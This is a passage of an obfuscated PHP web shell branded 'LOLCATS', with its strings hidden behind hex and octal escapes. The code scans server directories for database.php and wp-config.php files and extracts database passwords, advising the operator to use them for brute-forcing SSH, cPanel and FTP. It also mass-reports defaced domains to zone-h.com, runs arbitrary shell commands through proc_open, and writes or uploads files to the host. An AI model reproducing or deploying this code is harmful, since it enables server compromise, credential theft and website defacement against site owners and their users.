\x62\x6d\x69\x74\x22\x20\x6e\x61\x6d\145\75\42\143\150\141\x6e\147\x65\42\x20\166\x61\x6c\165\x65\x3d\42\x53\x75\x62\x6d\151\x74\x21\x22\x3e\xa\40\x20\40\40\x20\40\40\x20\40\40\x20\40\x3c\57\144\151\166\76\xa\x20\x20\40\x20\40\40\x20\40\x3c\57\146\157\162\155\x3e\xa\40\40\40\x20\x3c\57\x64\151\166\76"; if ($_SERVER["\122\105\121\x55\105\123\124\137\x4d\x45\x54\110\117\x44"] === "\x50\117\123\124") { $directoriesInput = $_POST["\144\151\162\x65\x63\164\157\162\x69\x65\163"]; $directories = array_map("\164\x72\x69\155", explode("\54", $directoriesInput)); $searchOption = $_POST["\163\x65\x61\x72\x63\x68\137\x6f\x70\164\151\157\x6e"]; $passwords = ''; if ($searchOption === "\x63\157\x6e\146\x69\147") { $filenameDatabase = "\144\141\x74\141\x62\141\163\x65\56\x70\x68\x70"; $filenameWpConfig = "\167\160\x2d\x63\157\x6e\x66\x69\147\56\160\x68\160"; $filesDatabase = findFiles($directories, $filenameDatabase); $filesWpConfig = findFiles($directories, $filenameWpConfig); foreach ($filesDatabase as $file) { $password = extractPassword($file); if ($password !== null) { $passwords .= htmlspecialchars($file . "\x3a\40" . $password) . "\12"; } } foreach ($filesWpConfig as $file) { $dbPassword = extractDbPassword($file); if ($dbPassword !== null) { $passwords .= htmlspecialchars($file . "\x3a\x20" . $dbPassword) . "\xa"; } } } elseif ($searchOption === "\155\x79\x73\161\154\x69\x5f\x63\157\x6e\156\x65\x63\164") { $filesWithMysqliConnect = findPhpFilesWithMysqliConnect($directories); foreach ($filesWithMysqliConnect as $file) { $passwords .= htmlspecialchars($file . "\40\x63\157\x6e\x74\x61\x69\x6e\x73\x20\155\x79\x73\x71\154\x69\137\x63\x6f\x6e\x6e\145\143\x74") . "\12"; } } if (!empty($passwords)) { echo "\74\x74\145\x78\164\141\x72\145\x61\40\x63\x6c\141\163\163\x3d\47\146\157\x72\x6d\55\143\x6f\156\164\x72\x6f\x6c\x20\142\x74\156\55\163\x6d\x20\164\x65\170\164\x2d\x64\141\x72\153\47\x20\x72\157\x77\x73\x3d\x27\67\x27\40\162\145\x61\x64\x6f\x6e\154\171\76" . $passwords . "\x3c\x2f\164\145\x78\164\x61\x72\x65\141\76"; echo "\x3c\160\40\x63\154\141\163\x73\75\x27\x74\145\x78\164\55\143\x65\x6e\164\145\162\x27\76\125\x73\145\x20\144\x61\164\x61\142\x61\163\145\x20\x70\141\163\x73\x77\x6f\x72\144\x73\x20\141\163\40\x77\x6f\162\144\154\x69\163\x74\x73\40\164\x6f\40\x70\x65\162\x66\x6f\162\155\40\x62\x72\165\x74\145\x66\x6f\x72\x63\x65\40\x53\123\x48\54\40\103\x50\141\156\145\154\x2c\x20\x46\x54\x50\x20\x61\x74\x74\x61\143\153\163\x20\145\x74\143\x2e\74\57\160\x3e\x3c\57\x64\x69\x76\76\74\x2f\x64\x69\x76\x3e"; } } } goto McR26; McR26: if ($_1337["\151\x64"] == "\x7a\x6f\x6e\145\x68") { s(); echo "\74\x63\x65\156\164\x65\x72\40\143\x6c\141\x73\x73\x3d\42\141\156\165\42\x3e\132\x6f\156\145\55\110\x20\115\x61\x73\163\40\x4e\157\164\x69\x66\171\x3c\57\x63\x65\x6e\x74\x65\162\76"; echo "\74\144\x69\x76\40\143\x6c\141\163\x73\75\47\x63\x61\x72\x64\x20\143\x61\x72\x64\55\x62\157\x64\171\40\x74\x65\170\x74\x2d\144\141\x72\x6b\40\x69\156\160\165\164\55\x67\x72\x6f\165\x70\x20\155\142\x2d\x33\x27\76"; if ($_POST["\163\165\142\155\151\164"]) { $domain = explode("\xd\xa", $_POST["\x75\162\154"]); $nick = $_POST["\x6e\x69\143\153"]; echo "\x44\145\146\141\143\x65\162\x20\117\x6e\150\x6f\x6c\x64\x3a\40\x3c\141\40\150\162\145\x66\75\x27\150\164\x74\x70\x3a\57\x2f\167\x77\167\x2e\172\157\x6e\x65\55\x68\56\157\162\147\x2f\x61\x72\x63\x68\x69\x76\145\x2f\156\157\164\x69\x66\151\145\162\75{$nick}\x2f\x70\165\142\x6c\x69\163\150\x65\144\75\60\x27\x20\164\x61\x72\x67\145\x74\x3d\47\x5f\x62\154\141\156\x6b\47\76\150\x74\164\160\x3a\x2f\57\167\167\x77\x2e\172\157\x6e\x65\55\x68\56\157\x72\x67\57\x61\162\143\x68\x69\x76\x65\x2f\156\157\164\x69\146\x69\145\x72\x3d{$nick}\57\x70\165\x62\154\151\x73\x68\145\144\75\x30\x3c\57\141\x3e\74\142\x72\x3e"; echo "\104\x65\146\141\x63\145\162\x20\101\x72\x63\x68\151\x76\145\x3a\40\74\x61\40\x68\x72\x65\x66\x3d\47\x68\x74\x74\160\72\57\x2f\167\167\167\x2e\172\157\x6e\x65\55\150\x2e\x6f\162\x67\57\x61\x72\x63\150\x69\x76\145\x2f\156\x6f\164\151\146\151\145\x72\75{$nick}\47\x20\164\141\162\147\145\164\x3d\x27\137\142\x6c\141\156\153\x27\76\150\x74\x74\x70\72\57\x2f\x77\167\167\x2e\x7a\157\156\x65\55\150\x2e\x6f\x72\x67\57\141\x72\143\150\x69\x76\x65\57\156\x6f\x74\x69\x66\x69\145\162\x3d{$nick}\x3c\x2f\x61\76\x3c\142\162\x3e\74\142\x72\x3e"; function zoneh($url, $nick) { $ch = curl_init("\x68\x74\164\160\72\57\x2f\x77\x77\x77\x2e\x7a\x6f\156\x65\x2d\150\x2e\x63\157\155\x2f\x6e\x6f\164\151\x66\171\57\163\151\156\147\x6c\145"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "\144\x65\146\141\x63\145\162\75{$nick}\46\x64\x6f\155\141\x69\156\x31\75{$url}\x26\x68\x61\143\x6b\155\157\x64\145\x3d\61\x26\162\x65\141\x73\x6f\156\75\x31\46\x73\x75\142\155\x69\x74\x3d\123\145\x6e\x64"); return curl_exec($ch); curl_close($ch); } foreach ($domain as $url) { $zoneh = zoneh($url, $nick); if (preg_match("\57\143\x6f\x6c\x6f\x72\75\x22\162\x65\144\x22\76\x4f\113\x3c\134\57\146\x6f\x6e\x74\76\x3c\x5c\x2f\x6c\x69\x3e\57\151", $zoneh)) { echo "{$url}\40\x2d\76\40\x4f\113\x3c\142\162\x3e"; } else { echo "{$url}\x20\55\x3e\x20\x45\x52\x52\x4f\122\x21\74\142\x72\76"; } } } else { echo "\x3c\146\x6f\162\155\x20\155\145\164\150\157\144\75\x22\x70\x6f\163\x74\x22\76\xa\40\x20\40\40\40\x20\x20\40\40\40\x20\x20\74\151\x20\x63\x6c\141\x73\x73\x3d\x22\142\151\40\142\x69\55\x70\x65\162\163\x6f\156\x22\76\74\x2f\x69\x3e\40\101\x74\x74\141\x63\x6b\145\162\40\116\x61\x6d\145\72\x20\12\40\x20\x20\40\40\x20\40\40\40\x20\40\x20\40\40\40\40\74\x69\x6e\x70\x75\x74\40\x74\x79\160\145\x3d\x22\164\x65\170\x74\x22\40\143\154\x61\x73\163\75\42\x66\x6f\162\155\55\143\x6f\156\164\x72\157\154\40\142\x74\x6e\x2d\x73\x6d\40\164\x65\170\x74\55\144\141\162\153\x22\x20\x6e\x61\155\x65\75\x22\x6e\x69\x63\x6b\x22\40\x73\x69\x7a\x65\x3d\42\x35\x30\x22\x20\x70\x6c\x61\143\145\150\x6f\154\144\145\162\75\x22\114\x6f\154\143\141\164\x73\x22\40\x69\144\75\42\156\151\x63\x6b\42\76\12\x20\40\40\x20\40\40\x20\x20\40\x20\x20\x20\x20\x20\40\40\74\x69\x20\143\154\x61\x73\163\75\42\142\x69\x20\x62\151\x2d\147\x6c\157\142\x65\62\42\x3e\x3c\x2f\x69\x3e\x20\x44\157\155\x61\151\x6e\x20\114\x69\163\x74\72\40\xa\40\x20\x20\x20\40\40\40\40\40\40\x20\40\x20\40\x20\40\74\x74\145\170\164\141\x72\145\141\x20\143\x6c\141\x73\163\x3d\42\146\x6f\162\x6d\55\143\x6f\156\x74\162\x6f\x6c\x20\142\164\156\55\163\155\x20\x74\145\x78\164\x2d\x64\141\162\153\42\40\x72\157\167\x73\x3d\42\x37\42\x20\156\x61\x6d\x65\75\42\x75\x72\154\42\x20\x70\154\141\143\145\150\x6f\154\x64\x65\x72\x3d\42\150\164\164\x70\x73\72\x2f\x2f\160\x69\x72\141\156\x68\141\x2e\147\x6f\x2e\151\144\57\157\x2e\x74\x78\164\x22\40\163\164\171\x6c\x65\x3d\42\x72\x65\x73\x69\172\145\x3a\40\x76\145\x72\x74\x69\143\141\154\x3b\42\x20\151\144\x3d\x22\x75\162\x6c\x22\x3e\74\57\x74\x65\x78\164\x61\x72\145\141\76\xa\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\x3c\x64\151\166\x20\x63\x6c\x61\x73\163\x3d\x22\x64\55\147\162\151\144\x20\x67\141\x70\55\62\x22\76\xa\x20\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\74\151\156\x70\x75\x74\x20\143\154\141\x73\163\75\x22\142\164\x6e\40\142\x74\x6e\x2d\x64\141\x72\x6b\40\x62\x74\156\x2d\163\155\x22\x20\x74\171\160\x65\x3d\x22\x73\x75\142\155\x69\164\42\x20\156\141\x6d\145\75\42\163\165\142\x6d\x69\x74\42\40\x76\141\154\x75\145\75\42\123\x75\x62\x6d\151\x74\41\42\x3e\12\x20\40\40\x20\x20\40\40\x20\40\40\40\40\x3c\57\144\x69\x76\x3e\12\40\x20\x20\x20\x20\40\40\x20\x3c\57\x66\x6f\x72\x6d\x3e"; } echo "\74\57\x64\x69\x76\x3e\74\57\144\151\x76\x3e"; } goto HKnrr; hJVd9: echo "\xa\74\x68\164\x6d\154\x3e\xa\11\x3c\x68\x65\141\144\x3e\12\11\11\74\x6d\145\x74\141\x20\x63\150\x61\x72\x73\x65\164\75\47\165\x74\146\x2d\70\x27\76\xa\x9\11\74\x6d\x65\x74\141\40\156\x61\155\145\75\47\141\x75\x74\150\157\x72\x27\40\x63\157\x6e\x74\145\156\164\75\47\x4c\117\114\x43\101\x54\123\47\x3e\xa\11\x9\x3c\x21\x2d\x2d\74\155\x65\x74\x61\40\156\141\x6d\x65\x3d\47\x76\151\x65\x77\160\x6f\x72\164\x27\40\143\157\156\164\x65\156\x74\x3d\x27\167\151\x64\x74\150\75\144\x65\x76\151\x63\x65\x2d\x77\151\x64\164\150\54\40\x69\x6e\151\x74\151\141\154\x2d\163\143\x61\154\145\x3d\60\x2e\x34\x30\x27\x3e\x2d\x2d\76\12\40\x20\40\x20\40\x20\40\40\74\x6d\145\x74\141\40\156\141\155\x65\75\47\166\x69\x65\167\160\x6f\162\164\x27\40\x63\x6f\156\164\145\x6e\x74\x3d\x27\167\151\144\x74\x68\x3d\144\x65\166\151\x63\x65\55\x77\151\x64\164\150\54\151\x6e\x69\164\x69\141\154\55\x73\143\141\154\x65\75\x31\x2c\155\x69\x6e\x69\x6d\165\x6d\55\x73\x63\141\x6c\145\75\x31\x27\76\xa\x9\x9\x3c\x6d\145\164\141\40\156\141\x6d\x65\75\x27\x72\x6f\x62\157\164\163\x27\x20\143\x6f\156\164\145\x6e\x74\75\x27\x6e\157\151\x6e\x64\x65\x78\x2c\40\156\x6f\x66\x6f\154\154\157\x77\x2c\x20\156\157\141\162\143\x68\x69\166\x65\47\x3e\12\x9\11\x3c\154\x69\156\153\x20\x72\x65\x6c\x3d\47\151\143\157\156\x27\x20\150\x72\x65\x66\x3d\x27\150\x74\164\x70\163\x3a\57\57\160\x69\143\56\x6f\156\x6c\x69\156\x65\x77\x65\x62\146\157\156\x74\x73\56\x63\x6f\155\57\x74\x68\x75\x6d\x62\156\x61\151\x6c\163\57\151\x63\x6f\156\x73\137\x35\66\x35\67\66\x2e\163\166\x67\47\x3e\xa\11\11\x3c\164\x69\164\x6c\145\76\x4c\117\114\103\101\x54\x53\74\57\x74\151\164\154\145\x3e\xa\x9\11\74\163\143\x72\151\160\x74\40\x73\162\x63\x3d\47\57\57\x63\144\x6e\x6a\x73\x2e\x63\154\x6f\x75\144\x66\x6c\x61\162\x65\x2e\x63\157\155\x2f\141\x6a\x61\x78\57\x6c\x69\142\163\x2f\x70\x72\151\163\x6d\x2f\61\x2e\x36\56\60\x2f\160\162\151\x73\155\x2e\152\163\47\x3e\74\57\x73\143\162\151\160\x74\x3e\12\x9\x9\x3c\x73\143\x72\x69\x70\x74\40\x73\x72\143\75\47\57\x2f\143\144\x6e\x2e\152\163\x64\145\154\x69\x76\x72\56\x6e\145\x74\57\x6e\160\155\57\x62\x6f\157\164\163\x74\x72\x61\160\x40\65\x2e\x30\56\61\x2f\x64\x69\163\x74\57\152\x73\x2f\x62\157\x6f\x74\163\164\x72\141\160\56\142\165\x6e\x64\154\145\x2e\155\x69\x6e\56\x6a\x73\x27\76\x3c\x2f\163\143\x72\x69\160\x74\x3e\12\x9\x9\x3c\163\143\x72\151\160\x74\x20\x73\162\x63\x3d\47\57\x2f\143\x6f\x64\145\x2e\x6a\x71\x75\x65\162\171\56\143\x6f\x6d\57\152\x71\x75\x65\x72\171\55\x33\56\x33\56\x31\x2e\x73\154\151\155\56\155\x69\x6e\56\x6a\x73\x27\x3e\x3c\57\163\143\162\x69\x70\x74\x3e\12\x20\40\40\x20\x20\40\x20\x20\x3c\x73\x63\x72\151\160\164\76\146\165\156\x63\164\151\x6f\156\40\x63\x6f\x70\x79\124\157\103\x6c\x69\x70\142\157\x61\x72\144\50\x29\40\173\166\141\x72\x20\x63\157\144\x65\40\x3d\40\144\x6f\x63\165\155\145\x6e\164\56\147\145\164\105\x6c\145\155\x65\x6e\164\x42\x79\x49\x64\x28\47\143\x6f\144\145\47\51\x2e\151\x6e\x6e\x65\162\124\x65\x78\x74\x3b\156\x61\166\151\147\141\x74\157\x72\56\x63\154\x69\160\142\157\141\162\144\56\x77\162\x69\x74\x65\124\x65\170\164\x28\143\157\144\x65\51\x2e\164\x68\145\x6e\x28\x66\x75\156\143\x74\x69\157\x6e\50\x29\x20\173\141\154\145\x72\164\x28\x27\x43\157\144\145\40\x63\x6f\160\151\145\144\40\164\157\x20\x63\x6c\151\160\x62\157\x61\162\144\x21\x27\51\73\x7d\x2c\x20\x66\x75\x6e\143\164\x69\157\156\50\x65\x72\x72\51\x20\x7b\143\x6f\x6e\x73\157\154\145\56\x65\162\162\157\162\50\x27\x46\x61\151\x6c\145\144\40\x74\157\40\x63\x6f\x70\171\x3a\x20\47\x2c\40\x65\162\162\x29\x3b\175\51\x3b\x7d\74\x2f\163\143\162\151\x70\x74\76\12\11\x9\74\x73\164\171\154\145\x3e\100\x69\x6d\160\x6f\162\x74\40\165\x72\x6c\x28\47\x2f\x2f\143\144\x6e\x2e\152\163\144\x65\x6c\x69\166\x72\x2e\156\145\164\x2f\x6e\x70\x6d\57\142\157\x6f\x74\x73\x74\162\x61\x70\55\x69\143\157\x6e\163\x40\61\56\63\x2e\x30\57\x66\157\156\x74\x2f\x62\x6f\x6f\164\x73\164\162\141\x70\55\151\143\157\156\x73\56\143\163\x73\x27\x29\73\xa\x40\x69\x6d\160\x6f\162\x74\40\x75\162\x6c\50\47\57\x2f\x63\144\156\56\152\163\x64\145\x6c\151\x76\162\x2e\156\145\164\x2f\x6e\160\155\x2f\x62\157\x6f\x74\163\164\x72\141\x70\100\65\x2e\61\x2e\63\x2f\x64\151\x73\x74\x2f\143\163\163\x2f\142\157\157\164\163\164\162\141\160\56\x6d\x69\x6e\56\x63\x73\x73\47\51\73\xa\x40\x69\x6d\160\x6f\162\x74\40\x75\162\x6c\50\x27\57\57\143\x64\156\x6a\x73\56\x63\x6c\x6f\165\x64\x66\x6c\x61\162\145\x2e\143\157\x6d\x2f\x61\152\x61\170\57\154\151\142\x73\57\x70\162\151\163\x6d\57\x31\56\x36\x2e\x30\57\x74\x68\145\155\145\x73\x2f\x70\162\151\x73\x6d\x2d\x6f\x6b\x61\x69\x64\151\x61\56\x63\x73\163\47\x29\73\xa\100\151\155\160\x6f\x72\164\x20\x75\162\154\50\x27\x68\x74\x74\x70\163\x3a\x2f\x2f\146\157\156\x74\x73\56\x67\157\157\x67\154\x65\141\x70\x69\x73\56\143\157\155\57\x63\x73\163\x32\77\146\x61\155\151\154\x79\75\125\x62\x75\156\164\x75\53\103\x6f\156\x64\145\156\x73\145\x64\47\51\x3b\xa\100\x69\155\160\157\x72\164\x20\x75\162\154\50\47\150\x74\x74\160\x73\x3a\57\57\146\x6f\156\164\x73\x2e\147\x6f\x6f\147\x6c\145\x61\160\151\x73\x2e\143\x6f\155\57\x63\x73\x73\x32\77\x66\141\155\151\154\171\x3d\123\x65\x64\x67\x77\151\x63\153\53\x41\x76\x65\x26\144\151\163\160\154\x61\x79\x3d\163\167\x61\160\47\x29\x3b\12\12\x62\157\144\x79\40\173\12\11\x63\x75\x72\163\157\x72\x3a\40\165\162\154\x28\x68\x74\164\160\x3a\x2f\x2f\x63\165\x72\x2e\x63\x75\x72\163\x6f\162\163\55\64\x75\x2e\156\145\x74\x2f\163\x79\155\142\x6f\154\x73\x2f\x73\171\155\55\61\x2f\163\x79\155\64\66\x2e\143\x75\x72\x29\54\x20\x70\162\157\x67\162\145\x73\x73\x20\x21\151\x6d\x70\x6f\x72\x74\x61\x6e\x74\73\xa\11\x66\x6f\156\x74\x2d\x66\x61\x6d\x69\154\x79\72\x20\47\125\x62\165\x6e\x74\165\40\103\157\156\144\145\156\163\145\x64\47\73\12\175\12\x2e\143\x6f\160\171\x2d\142\165\x74\164\157\156\x20\173\xa\40\40\x20\x20\160\157\163\151\164\x69\157\x6e\72\40\x61\142\163\x6f\154\165\x74\145\x3b\xa\40\40\x20\40\164\x6f\160\72\x20\61\60\x70\x78\x3b\12\x20\x20\40\40\162\151\147\150\x74\x3a\40\61\60\x70\x78\x3b\xa\175\xa\x2e\163\150\145\154\154\40\173\12\x9\142\157\x72\144\145\162\55\162\x61\144\151\x75\163\x3a\x20\x34\x70\170\73\xa\x9\x62\x6f\162\x64\x65\x72\x3a\40\x31\x70\x78\40\x73\157\x6c\x69\144\x20\x72\147\x62\x61\x28\62\65\x35\x2c\40\62\65\65\x2c\40\x32\x35\x35\54\40\60\x2e\64\51\73\xa\x9\x66\x6f\156\164\55\x73\151\x7a\145\72\x20\x31\x30\160\x74\x3b\12\11\144\151\163\160\154\141\171\72\40\146\x6c\145\x78\x3b\12\x9\x66\x6c\145\x78\55\144\151\162\145\143\164\151\157\156\72\40\x63\157\154\x75\x6d\x6e\x3b\12\x9\x61\154\x69\x67\x6e\x2d\151\x74\145\155\x73\x3a\x20\163\x74\x72\x65\x74\143\x68\x3b\12\x9\x62\x61\143\x6b\x67\x72\x6f\165\x6e\144\x3a\40\x23\x32\64\x32\x34\62\x34\73\xa\11\x63\x6f\154\x6f\162\x3a\x20\43\x66\x66\x66\x3b\12\175\12\xa\56\160\162\x65\x20\x7b\xa\11\150\145\151\x67\150\164\72\x20\x31\x35\60\x70\x78\73\xa\11\x6f\x76\x65\x72\x66\154\x6f\167\72\40\x61\x75\164\157\73\12\11\167\150\151\164\145\55\163\x70\141\143\145\72\x20\x70\x72\x65\x2d\x77\162\x61\x70\73\xa\x9\x66\x6c\x65\x78\55\147\162\x6f\x77\72\40\x31\73\xa\11\155\x61\162\x67\151\x6e\x3a\x20\61\60\160\170\x20\141\165\164\157\x3b\xa\x9\160\x61\144\144\151\x6e\147\72\x20\61\60\x70\x78\x3b\xa\x9\x6c\151\156\x65\x2d\150\x65\x69\x67\150\164\x3a\40\x31\56\x33\x65\155\73\12\11\157\166\x65\x72\146\x6c\157\167\55\170\72\x20\x73\143\162\157\x6c\x6c\x3b\12\175\xa\xa\56\141\156\x75\54\12\x6b\x62\x64\x20\x7b\xa\11\146\157\x6e\x74\x2d\x66\141\155\151\x6c\171\72\40\x27\x53\145\144\x67\167\151\143\x6b\40\x41\x76\145\47\x2c\40\143\x75\162\163\151\166\145\73\xa\x7d\xa\12\56\143\157\162\x6e\x65\162\x20\173\12\11\164\145\170\164\55\x61\154\151\147\156\72\x20\x72\x69\x67\150\x74\73\xa\11\155\x61\162\x67\151\156\x2d\x74\x6f\x70\72\x20\x2d\x31\x30\x70\170\x3b\xa\11\x66\x6f\x6e\164\55\163\151\x7a\145\72\x20\61\62\160\x78\x3b\12\175\xa\12\147\x72\40\x7b\12\x9\143\157\x6c\x6f\x72\72\x20\154\x69\x6d\145\73\12\175\12\xa\151\150\40\173\12\x9\143\157\x6c\157\x72\72\x20\167\x68\151\164\x65\x3b\12\x7d\xa\162\x65\40\x7b\xa\11\143\157\x6c\157\x72\72\x20\x67\162\x61\x79\x3b\xa\x7d\xa\x72\x64\40\173\xa\11\143\157\x6c\x6f\x72\72\40\x72\145\x64\73\xa\x7d\12\12\56\x63\x65\x6e\164\x65\x72\40\173\xa\11\164\145\x78\164\55\141\x6c\x69\147\x6e\x3a\40\143\x65\x6e\164\145\x72\x3b\xa\175\xa\12\x2e\x63\x65\x6e\x74\x65\x72\x20\x74\x61\142\154\x65\40\x7b\xa\11\155\x61\162\147\151\156\x3a\x20\x31\x65\x6d\x20\x61\x75\164\x6f\73\12\x9\x74\145\170\x74\55\141\x6c\x69\x67\x6e\x3a\40\x6c\145\x66\164\x3b\xa\x7d\12\12\56\x63\145\156\164\x65\162\40\164\150\40\x7b\xa\x9\x74\145\x78\164\55\141\154\151\x67\156\x3a\40\143\145\156\x74\x65\x72\x20\41\x69\155\160\157\x72\164\x61\x6e\164\73\xa\175\xa\xa\x2e\160\150\160\x5f\x69\156\146\x6f\x20\x74\x64\54\12\164\x68\x20\173\xa\11\142\157\162\x64\x65\x72\x3a\40\x31\x70\x78\40\163\157\154\151\x64\40\x23\66\66\66\x3b\12\x9\146\x6f\156\164\55\x73\151\172\x65\72\40\x37\65\x25\x3b\12\x9\166\145\162\164\151\x63\141\154\55\141\154\151\147\x6e\72\x20\x62\x61\163\x65\154\x69\x6e\145\73\xa\x9\160\x61\144\144\151\x6e\x67\x3a\x20\64\160\x78\x20\65\160\170\73\12\175\12\xa\x2e\x70\40\173\12\x9\x74\145\170\164\55\x61\x6c\x69\147\x6e\x3a\x20\x6c\145\x66\164\73\12\175\12\xa\x2e\x65\40\173\xa\x9\x62\x61\x63\x6b\x67\162\157\x75\x6e\144\x2d\143\x6f\154\157\x72\72\x20\43\143\143\x66\x3b\xa\11\167\151\144\x74\x68\72\40\63\x30\60\160\170\73\12\11\146\157\156\164\55\x77\145\151\x67\150\x74\x3a\40\142\157\x6c\144\73\12\175\12\xa\x2e\150\x20\x7b\12\x9\x62\x61\x63\153\x67\x72\x6f\x75\156\x64\x2d\x63\x6f\154\157\162\72\40\43\71\x39\143\73\12\11\x66\157\x6e\x74\55\x77\145\x69\147\150\x74\x3a\x20\x62\x6f\154\144\x3b\12\175\xa\12\x2e\166\x20\173\12\11\x62\141\x63\153\x67\162\x6f\x75\x6e\144\x2d\143\x6f\x6c\x6f\x72\72\40\43\144\x64\x64\73\xa\11\155\141\170\x2d\x77\x69\144\164\x68\72\40\x33\60\60\160\170\x3b\12\11\157\x76\145\x72\x66\x6c\157\x77\55\170\x3a\40\x61\x75\x74\157\73\xa\11\x77\x6f\162\x64\55\x77\162\x61\x70\x3a\x20\x62\162\x65\141\153\x2d\167\157\162\144\x3b\12\x7d\12\xa\x2e\166\x20\x69\x20\x7b\12\x9\x63\157\x6c\x6f\162\x3a\40\x23\71\x39\x39\73\xa\175\xa\12\151\x6d\x67\x20\x7b\xa\11\146\x6c\x6f\141\x74\x3a\40\162\x69\147\150\x74\73\xa\x9\142\x6f\162\144\145\x72\x3a\x20\x30\x3b\12\x7d\12\xa\150\162\40\173\12\x9\x77\x69\x64\x74\x68\72\x20\71\x33\x34\160\170\73\xa\11\x62\141\x63\x6b\x67\x72\x6f\x75\156\144\x2d\x63\157\154\157\x72\x3a\40\43\143\x63\x63\x3b\12\x9\142\157\162\144\x65\162\72\x20\60\x3b\12\11\150\145\x69\x67\150\164\72\40\61\x70\170\73\12\x7d\12\12\x68\61\x20\173\12\11\146\157\156\x74\55\163\151\x7a\x65\72\x20\61\65\x30\x25\x3b\xa\175\12\xa\x68\62\x20\173\12\x9\x66\157\156\x74\55\163\151\172\145\72\40\x31\62\x35\x25\73\12\x7d\12\xa\x3c\x2f\163\x74\x79\154\145\x3e\xa\x9\74\57\x68\145\x61\144\x3e\xa\74\x62\157\144\171\x20\143\x6c\141\x73\x73\75\47\142\x67\55\144\141\x72\153\40\164\x65\x78\x74\55\154\x69\x67\x68\164\x27\76\12\x3c\x64\151\166\40\x63\x6c\141\163\x73\x3d\x27\x62\x6f\170\40\x73\x68\x61\144\x6f\167\40\x62\147\x2d\144\x61\162\x6b\x20\x70\55\64\x20\162\x6f\165\x6e\x64\145\144\55\x33\x27\76\xa\x3c\x61\40\143\154\141\163\x73\x3d\x27\164\145\170\x74\x2d\x64\145\143\157\162\141\x74\x69\x6f\x6e\55\156\157\156\145\40\x74\145\170\x74\x2d\154\x69\147\x68\x74\x20\141\156\165\47\40\x68\162\x65\146\75\x27" . $_SERVER["\x50\x48\x50\x5f\x53\x45\x4c\106"] . "\47\x3e\x3c\150\61\x3e\x4c" . "\117" . "\x4c\x43" . "\x41" . "\x54\x53\x3c\x2f\x68\x31\76\74\x2f\x61\x3e"; goto T0K_d; O80k0: function exe_root($set, $sad) { $x = "\160\x72\x65\x67\137\x6d\141\164\x63\x68"; $xx = "\x32\76\x26\61"; if (!$x("\57" . $xx . "\57\x69", $set)) { $set = $set . "\40" . $xx; } $a = "\x66\x75\156\143\x74\151\x6f\x6e\x5f\x65\x78\151\x73\164\x73"; $b = "\x70\162\157\143\137\x6f\x70\x65\156"; $c = "\x68\164\x6d\x6c\x73\160\x65\143\151\141\154\x63\x68\x61\x72\163"; $d = "\163\164\162\x65\x61\x6d\137\147\x65\164\137\x63\x6f\156\x74\x65\x6e\x74\163"; if ($a($b)) { $ps = $b($set, array(0 => array("\160\151\160\x65", "\x72"), 1 => array("\x70\x69\x70\x65", "\x77"), 2 => array("\160\151\x70\145", "\x72")), $pink, $sad); return $d($pink[1]); } else { return "\160\162\x6f\x63\x5f\157\160\145\156\x20\x66\165\156\143\164\x69\x6f\156\40\x69\x73\40\x64\151\163\x61\x62\154\145\144\41"; } } goto n2Jfp; Nd1vW: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\74\151\40\143\x6c\x61\x73\163\75\47\142\x69\40\x62\151\x2d\x68\x64\144\55\x72\141\143\x6b\x27\x3e\74\57\151\76\40\x3a\40\x3c\141\x20\143\x6c\141\x73\163\x3d\47\x74\x65\170\x74\x2d\x64\145\x63\157\x72\x61\x74\151\x6f\x6e\55\156\157\156\x65\40\164\145\170\x74\x2d\x6c\x69\147\x68\164\47\x20\150\162\145\146\x3d\x27\77\x70\x61\164\150\75\57\x27\x3e\57\74\x2f\x61\x3e"; continue; } if ($pat == '') { continue; } echo "\74\141\x20\x63\x6c\141\163\163\75\47\x74\x65\x78\164\55\144\x65\x63\157\162\x61\x74\151\x6f\156\x2d\x6e\157\x6e\145\x20\164\x65\x78\164\x2d\x6c\151\147\x68\164\47\40\x68\162\145\146\x3d\x27\77\x70\141\x74\x68\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\x2f"; } } echo "\x27\76" . $pat . "\74\x2f\141\x3e\57"; } goto qpHXb; lI5Xj: $gcc = exe("\147\x63\143\40\x2d\55\x68\x65\154\160") ? "\74\x67\x72\x3e\x4f\x4e\x3c\x2f\147\162\76" : "\74\162\144\x3e\117\x46\x46\74\x2f\x72\144\76"; goto uqK5Y; brEKJ: if (isset($_1337["\146\151\x6c\x65\x6e\145\x77"])) { s(); if (isset($_1337["\142\151\153\x69\x6e"])) { $name = $_1337["\156\141\155\145\x5f\146\x69\x6c\x65"]; $contents_file = $_1337["\143\157\156\164\x65\x6e\164\x73\137\x66\x69\x6c\145"]; $files = $_FILES["\146\x69\x6c\145\137\x75\x70\154\x6f\x61\144"]; $path = isset($_1337["\x70\141\164\150"]) ? $_1337["\160\x61\x74\x68"] : ''; foreach ($name as $index => $name_file) { $handle = @fopen($name_file, "\167"); $create = false; if ($contents_file && strlen($contents_file) > 0) { $create = @fwrite($handle, $contents_file); } else { if (isset($files["\164\x6d\x70\137\156\141\x6d\145"][$index]) && $files["\163\151\172\x65"][$index] > 0) { $create = move_uploaded_file($files["\x74\x6d\x70\137\x6e\141\155\145"][$index], $name_file); } else { $file_contents = file_get_contents($files["\164\155\x70\137\156\x61\x6d\145"][$index]); $create = file_put_contents($name_file, $file_contents); if (!$create) { $create = copy($files["\164\155\x70\137\x6e\x61\155\x65"][$index], $name_file); } } } fclose($handle); } if ($create) { echo "\x3c\163\164\x72\157\156\147\76\x43\x72\x65\141\164\145\x20\x66\151\x6c\x65\x3c\57\163\x74\x72\x6f\x6e\147\x3e\40\x4f\113\x21\x20" . ok() . "\x3c\57\x64\x69\x76\x3e"; } else { echo "\74\x73\x74\162\x6f\156\x67\76\x43\162\x65\x61\x74\x65\x20\x66\151\x6c\145\74\x2f\x73\164\162\x6f\x6e\x67\76\x20\x46\101\x49\114\41\40" . er() . "\74\x2f\x64\x69\166\x3e"; } } echo 